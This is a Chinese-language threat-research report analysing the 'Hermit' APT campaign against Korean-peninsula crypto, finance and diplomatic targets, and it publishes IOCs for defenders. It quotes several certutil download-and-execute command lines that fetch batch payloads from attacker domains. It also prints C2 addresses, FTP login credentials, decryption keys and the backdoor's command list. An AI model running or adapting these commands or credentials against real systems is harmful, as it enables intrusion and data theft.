威胁研究正文

Hermit(隐士)活动续:继续针对朝鲜半岛进行的APT攻击活动

2019-05-24 09:32:16

腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。

一、背景

腾讯安全御见威胁情报中心曾在201812月发布了分析文章:《Hermit(隐士):针对朝鲜半岛的APT攻击活动披露》。近期,腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。

本次攻击活动跟之前的活动相比,技术手段类似,但是也有一定的更新,如通过下载新的doc文档来完成后续的攻击以及使用AMADEY家族的木马。而最终的目标依然为运行开源的babyface远控木马。此外,传统的Syscon/Sandy家族的后门木马也依然在进行活跃。

二、攻击技术分析

1、攻击入口

本次攻击采用鱼叉攻击的方式,投递的攻击诱饵为doc文档,信息如下:

文件hash

文件名

文件类型

文档作者

最后修改者

最后修改时间

上传到VT时间

237026e58e0ac6ce109d874d43d3d64e

20190429_13.doc

MS Word Document

BlueSky

BlueSky

2019:04:29 07:22:00

2019-04-30 03:54:41

c0c007ce1a2d9fb8420c421d419f9f87

20190513_8.doc

MS Word Document

BlueSky

BlueSky

2019:05:13 05:25:00

2019-05-15 05:22:20






20190513_8.doc为例,运行文档后,首先会提示启用宏:

启用宏代码后,会从http://fighiting1013.org/2/modif8.doc下载回来一个新的doc文档,重命名为20190513-8.doc(跟文档同名),然后打开下载回来的文档并关闭原始文档:


modif8.doc打开后内容如下:


文档内容跟区块链信息相关:


打开文档后,同样提示启用宏。宏代码启用后,会执行以下命令:

cmd.exe /q /c copy /Y %windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://tgbabcrfv.1apps.com/1.txt && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat


该命令首先将certutil.exe复制到%TEMP%目录下并命名为ct.exe,随后利用ct.exe去下载1.txt并拷贝为1.bat,删除1.txt后执行1.bat

http://tgbabcrfv.1apps.com/1.txt内容为:


1.bat批处理文件会去下载3.txt并解码重命名为setup.cab文件。然后解压安装cab文件到%TEMP%目录下,随后运行解压安装后的install.bat


解码后为:


install.batvictory.exe移动到 C:\Users\Public\Documents 目录下,并设置注册表自启:


2、植入的恶意文件分析

1) victory.exe分析

样本通过EnumWindows回调函数进行解密,并创建同名子进程,解密密钥为:”hmrdeuhnetfiovtyeftqodhguhvnqkqurpmaflrpbnyezvwi”



对解密出来的PE分析,首先样本会对内置的硬编码进行解密:


并且收集本地机器信息,包括本地杀软信息:



收集完成后通过http post发送给服务器,服务器回传信息中包含进一步下载连接。下载地址为:http://fighiting1013.org/2/sp.exe


接收到服务器回传信息后,会去下载地址下载可执行程序并运行:


而通过访问该木马的C2,可以发现该木马为AMADEY家族的木马:


2) sp.exe分析

经过对sp.exe的分析,该RAT跟之前我们曝光的一样,同样为babyface远控:



C2为5.252.198.93:7337


木马向C2服务器发送数据

三、关联分析

1、Hermit(隐士)行动的关系

无论是宏代码,还是解码方式,还是最终的脚本形式,都跟之前我们披露的Hermit(隐士)行动一致,而隐士行动跟syscon以及konni的关系,之前的文章已经有比较详细的描述,本文就不再赘述;

如之前的行动的执行脚本:


宏代码:


都跟本次的攻击活动类似。此外,作者的信息同样都为BlueSky



而从基础设施上,依然喜欢使用一些动态的域名来进行攻击,如1apps000webhostapp等。

当然,本次攻击行动跟之前比,在技术上也进行了一定小幅度的更新:

1) 采用下载新的文档的形式来执行恶意代码;

2) 采用商用的AMADEY家族木马来进行传播;

2、年初的syscon攻击活动

根据同样的宏特征、基础设施的特征,在腾讯安全御见大数据中心的样本库里,我们同样找到了年初的攻击活动。

攻击诱饵文档:

文件hash

文件名

文件类型

文档作者

最后修改者

最后修改时间

上传到VT时间

68b080cdc748e9357e75a65fba30eaa7

igtaud.doc

MS Word Document

N/A

Windows User

2019:01:21 23:36:00

2019-01-23 12:57:34




打开后,提示需要启用宏,且文档内容模糊:


启用宏后:



宏代码为:


与之前的攻击的宏代码相似似,本次攻击命令存放在http://clean.1apps.com/1.txt


1.bat的主要功能是主要根据系统类型下载cab文件到本地展开执行,实现木马的安装。

木马核心功能:

经分析,本次使用的SYSCON后门使用ftp协议进行控制,这也是该后门最大的特点,木马首先会读取同目录下的同名ini文件,并将其解密得到存放C2地址的url链接:http://clean.1apps.com/4.txt,将该文件下载解密后得到C2的地址,以及使用的ftp用户名和密码。


30

从同名.ini文件中读取配置信息,解密后得到一个url这是本次版本最大的变化之处,之前解密后直接得到C2

url指向的文件下载回来存为temp.ini,使用相同的方法解密后得到C2


31


32

其中,C2信息为:

FTP Serverftpupload.net >> 185.27.134.11

UserNameb9_23329410

PASS WORDtailung

解密出配置信息后,通过运行systeminfotasklist命令来收集系统信息,收集后输出到temp.ini,并压缩上传到C2中,上传的文件名格式为to + 计算机名 + 时间:


33

上传systeminfo tasklist结果到C2,然后查找C2上的名为to everyone 的文件,读取内容解密后得到命令进行命令分发:


34

所支持命令如下:

命令

功能

cmd /c

/user标志

explorer权限执行命令

/stext>

执行命令并把结果输出到temp.ini

不带任何标志

WinExec执行指定命令

pull

上传指定文件

chip

通过修改配置文件实现修改木马C2

put

移动文件

相关的控制命令:

to everyone (0).txt

rundll32 加载%appdata%\Microsoft\Office\qsisxkey.dll 调用SetupHook接口


35

to everyone (1).txt:上传%appdata%\Microsoft\Office\qsisxkey.txt


36

to everyone (2).txt:执行dir命令,列举目录%appdata%\Microsoft\Office\


37

to everyone (3).txt:删除%appdata%\Microsoft\Office\qsisxkey.txt


38

从本次的活动来看,所使用的恶意文件为该组织较传统的Syscon/Sandy木马。


3、更多的行动

从最终的c25.252.198.93,我们又关联到其他的攻击样本,

如:0072b08eb4c1fe2201c52e26833beeb0

该文件同样会下载txt并利用certutil.exe进行解密:

http://csewater.co.kr/workfolder/work/monitor/1.txt

http://csewater.co.kr/workfolder/work/monitor/setup.txt

下载回的内容如下:

解码后命名为setup.cab

解压执行install.bat

然后启动ntutil.exe

ntutil.exe利用EnumWindows回调函数进行解密,解密出一个新的PE并创建同名子进程。解密key为:

“thxlezgblyteznaulbwwdzkczexrpbmatepgzkqjyttbbsav”

对解密后的样本为一样为Babyface

C2为解密后的winnet.ini中的内容:5.252.198.93:7337

同样,我们将该行动归属到本次的隐士行动中。而根据该文件,我们又扩展得到大量的文件,且均可归属到该行动中。而从诱饵内容来看,都跟朝鲜半岛的数字货币、金融等相关,跟本次攻击行动的一致。

如:3e4015366126dcdbdcc8b5c508a6d25c

执行命令:C:\WINDOWS\system32\cmd.exe /c C: && cd %TEMP% && certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit

诱饵内容:


如:dabccfdd50e593a8cb961a39296f0edf

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd %TEMP% && certutil -urlcache -split -f https://071790.000webhostapp.com/vic/1.txt && ren 1.txt 1.bat && 1.bat && exit

诱饵内容:


又如:268fb8da9c7d4c18d0ea1e9a3cbbc449

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd %TEMP% && certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit

诱饵内容:


又如:f2d2a2ea4654b2369378fae0b4b9574d

执行命令:

C:\Windows\system32\cmd.exe /c C: && cd %TEMP% && certutil -urlcache -split -f http://a7788.1apps.com/att/1.txt && ren 1.txt 1.bat && 1.bat && exit

诱饵内容:


4、 TA505的关系

我们发现,本次的诱饵内容同TA505的诱饵类似:

如文件:51ce85fdf98e29acf3cce5493888b6bb


而前段时间,TA505同样使用AMADEY家族的木马来进行传播。

此外,TA505同样被认为是一支来自于朝鲜半岛的攻击组织,组织目标为金融、数字货币等,跟该攻击活动也有一定的重合。

当然我们也暂未发现更多的强证据来证明TA505同隐士的关系,我们也会持续保持跟踪。

四、解决方案

Hermit(隐士)的活跃地区为世界热点地区,离我国很近,我们提醒国内有关单位、企业在日常工作中,注意采取一些必要的安全措施,防止成为APT攻击的受害者:

1、不要打开不明来源的邮件附件;

2、及时打系统补丁和重要软件的补丁;

3、小心处理Office文档,除非确认文档来源可靠,充分了解打开文档的后果,否则务必不要开启Office启用宏代码;

4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;

5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。


五、附录

1、 IOCs

MD5

c0c007ce1a2d9fb8420c421d419f9f87

c0c007ce1a2d9fb8420c421d419f9f87

9768b1208506e7f026625be173cdb2ee

a59dbf872d4d275415caed24f93a4d02

eb800f555ad690d99d34b1a3b05f610a

a9bd8c69ba5ea70002e776c9f618157b

43cbadadaead6f11295bf8843bd909ed

68b080cdc748e9357e75a65fba30eaa7

2df5a0be61f9b09f380a3fc20945afc0 

ed527d42819ad7ed9bbaa2791e8bb445 

46f3540f9a850d3114261e9f1c88100d 

63dc47d134d7dade7fa3e290d879eba4 

5968b80e0567a25909273ccf3527dd83 

63dc47d134d7dade7fa3e290d879eba4 

ed527d42819ad7ed9bbaa2791e8bb445 

a5406729bf6acda782022ac5486436c3 

a9bd8c69ba5ea70002e776c9f618157b

3e4015366126dcdbdcc8b5c508a6d25c

7d842177155e20b7b42b0a68ba9081e3

f2d2a2ea4654b2369378fae0b4b9574d

dabccfdd50e593a8cb961a39296f0edf

d896402609e63fc48c7f2433b10c1038

f38d61237d4ecfb87b58cfcd4fd9dd44

c2c2a8e9c5b8298d77a225bf3476b7ae

268fb8da9c7d4c18d0ea1e9a3cbbc449

fb42ddf48bc581fb9aa8d13f1e4636d1


C&C

tgbabcrfv.1apps.com

fighiting1013.org

charley-online.com

5.252.198.93:7337

alabamaok0515.1apps.com

mail.naver-download.com

clean.1apps.com

ftpupload.net

s8877.1apps.com

hanbosston.000webhostapp.com

a7788.1apps.com/att

071790.000webhostapp.com

attach10132.1apps.com

881.000webhostapp.com


pdb

c:\miniprojects\x86il\il86\x64\release\IL86.pdb

D:\Attack\DropperBuild\x64\Release\Dropper.pdb


2、 参考链接

1) Hermit(隐士):针对朝鲜半岛的APT攻击活动披露

https://s.tencent.com/research/report/613.html

2) SANNY Malware Delivery Method Updated in Recently Observed Attacks

https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

3) TA505 intensifica ciberataques a Chile y Latinoamérica con #FlawedAmmy

https://medium.com/@1ZRR4H/ta505-intensifica-ciberataques-a-chile-y-latinoam%C3%A9rica-con-flawedammy-9fb92c2f0552

4) 한국어 구사 Konni 조직, 블루 스카이 작전 'Amadey' 러시아 봇넷 활용
https://blog.alyac.co.kr/2308

在线咨询

方案定制